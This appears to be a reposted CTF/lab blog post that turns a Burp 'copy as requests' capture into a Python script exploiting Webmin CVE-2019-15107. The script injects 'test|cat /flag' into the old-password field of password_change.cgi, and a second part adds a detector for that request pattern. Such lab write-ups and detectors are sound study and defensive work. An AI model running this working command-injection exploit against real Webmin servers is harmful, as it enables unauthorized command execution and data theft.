Using Burp's Copy As Requests plugin from Python to retrieve flags in batch (Webmin vulnerability CVE-2019-15107)
Author: Internet
Webmin vulnerability CVE-2019-15107, vulnerability principle:
In Burp Suite, right-click the request and choose "copy as requests":

```python
burp0_url = "https://192.168.184.128:10000/password_change.cgi"
burp0_cookies = {"redirect": "1", "testing": "1", "sid": "x", "sessiontest": "1"}
burp0_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": "https://192.168.184.128:10000/session_login.cgi", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"user": "rootxx", "pam": '', "expired": "2", "old": "test|cat /flag", "new1": "test2", "new2": "test2"}
flag = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)
```
Two things still need handling: the character encoding of the POST response body, and the HTTPS interaction. For the latter, install an OpenSSL Python library, import the module, and suppress the warnings.
The code is as follows:

```python
import requests

# Silence the InsecureRequestWarning that verify=False would otherwise print on every request
requests.packages.urllib3.disable_warnings()


burp0_url = "https://192.168.184.128:10000/password_change.cgi"
burp0_cookies = {"redirect": "1", "testing": "1", "sid": "x", "sessiontest": "1"}
burp0_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": "https://192.168.184.128:10000/session_login.cgi", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"user": "rootxx", "pam": '', "expired": "2", "old": "test|cat /flag", "new1": "test2", "new2": "test2"}
# verify=False skips TLS certificate verification (the lab host uses a self-signed certificate)
flag = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)

# with open("./1.txt", "w") as f:
#     print(type(flag.content.decode("gbk")))
#     f.write(flag.content.decode("gbk"))
# The response body is GBK-encoded, so decode it explicitly before searching
findflag = flag.content.decode("gbk")
result = "flag" in findflag
indexstart = findflag.find("flag")
print(findflag[indexstart:indexstart+11])
# print(result)
```
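The request above is exactly the shape a defender should be looking for in proxy, WAF or Webmin access records: a POST to password_change.cgi that carries the `expired` parameter and shell metacharacters in the `old` (old password) field. The following detector is an added example written for this page; it is not the original author's code. The record format (a dict with `src`, `method`, `path` and `body`) and the sample requests are constructed assumptions, and the metacharacter list is a pragmatic choice rather than an exhaustive grammar.

```python
import re
from urllib.parse import parse_qs

# Endpoint abused by CVE-2019-15107 (taken from the request shown on this page)
VULN_PATH = "/password_change.cgi"

# Shell metacharacters that would turn a password-field value into a command.
# Assumption: a pragmatic list covering pipes, separators, subshells and newlines.
SHELL_META = re.compile(r"[|;&`$(){}\n]")


def is_cve_2019_15107_attempt(method, path, body):
    """Return True when a request matches the CVE-2019-15107 injection pattern:
    POST to password_change.cgi with the 'expired' flag set and shell
    metacharacters in the 'old' parameter (the form-encoded old password)."""
    if method.upper() != "POST":
        return False
    if not path.split("?")[0].endswith(VULN_PATH):
        return False
    # parse_qs decodes %7C -> '|' and '+' -> ' ', so encoded payloads are caught too
    params = parse_qs(body, keep_blank_values=True)
    if "expired" not in params:
        return False
    old = params.get("old", [""])[0]
    return bool(SHELL_META.search(old))


def scan_requests(records):
    """Return the source addresses of records that look like exploitation attempts.
    Each record is a dict with 'src', 'method', 'path' and 'body' (assumed format)."""
    return [
        r["src"] for r in records
        if is_cve_2019_15107_attempt(r["method"], r["path"], r["body"])
    ]


# Constructed sample records: one login, one legitimate password change,
# one GET to the endpoint, and one matching the payload used on this page.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.2", "method": "POST", "path": "/session_login.cgi",
     "body": "user=alice&pass=Winter2019"},
    {"src": "10.0.0.3", "method": "POST", "path": "/password_change.cgi",
     "body": "user=alice&pam=&expired=2&old=Winter2019&new1=Spring2020&new2=Spring2020"},
    {"src": "10.0.0.4", "method": "GET", "path": "/password_change.cgi", "body": ""},
    {"src": "10.0.0.5", "method": "POST", "path": "/password_change.cgi",
     "body": "user=rootxx&pam=&expired=2&old=test%7Ccat+%2Fflag&new1=test2&new2=test2"},
]

if __name__ == "__main__":
    print("suspicious sources:", scan_requests(SAMPLE_REQUESTS))
```

A legitimate password change that happens to contain one of these characters will be flagged as well, so treat a hit as an alert to review rather than an automatic block; the `expired` parameter together with a POST to this endpoint is the narrow condition, and the metacharacter check is what separates it from ordinary use.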
Tags: plugin, burp0, python, cookies, webmin, headers, flag, requests, data. Source: https://www.cnblogs.com/R1card0/p/11406011.html